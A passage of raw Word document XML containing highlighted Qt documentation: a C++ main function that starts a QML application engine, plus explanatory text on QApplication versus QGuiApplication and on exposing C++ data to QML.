          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> argc</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[])</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un"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>{</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QApplication</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>argc</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> argv</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QQmlApplicationEngine</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"main.qml"</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0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42E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> app</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B42CD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We are using</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId555" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QApplication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and not</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId556" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QGuiApplication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in this example. Though you can use</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId557" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QGuiApplication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">instead, doing this will </w:t>
      </w:r>
      <w:r w:rsidRPr="00B42CD3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eliminate platform-dependent stylin</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>g. This is because it is relying on the widget module to provide the native look and feel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="360" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="737" w:name="using-c-data-from-qml"/>
      <w:bookmarkStart w:id="738" w:name="_Toc483000687"/>
      <w:bookmarkStart w:id="739" w:name="_Toc483003704"/>
      <w:bookmarkStart w:id="740" w:name="_Toc483604039"/>
      <w:bookmarkStart w:id="741" w:name="_Toc483605259"/>
      <w:bookmarkEnd w:id="737"/>
      <w:r w:rsidRPr="005E64B4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using C++ Data From QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="738"/>
      <w:bookmarkEnd w:id="739"/>
      <w:bookmarkEnd w:id="740"/>
      <w:bookmarkEnd w:id="741"/>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you need to register a C++ class to use from QML, you can call, for example,</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId558" w:anchor="qmlRegisterType" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>before declaring</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> your</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId559" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlApplicationEngine</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. You can find the list of all registering functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId560" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00242E0B" w:rsidRPr="00242E0B" w:rsidRDefault="00242E0B" w:rsidP="00242E0B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If you need </w:t>
      </w:r>
      <w:r w:rsidRPr="008573B7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to expose data to QML components</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, you need to set them to the context of the current QML engine. See</w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId561" w:history="1">
        <w:r w:rsidRPr="008573B7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
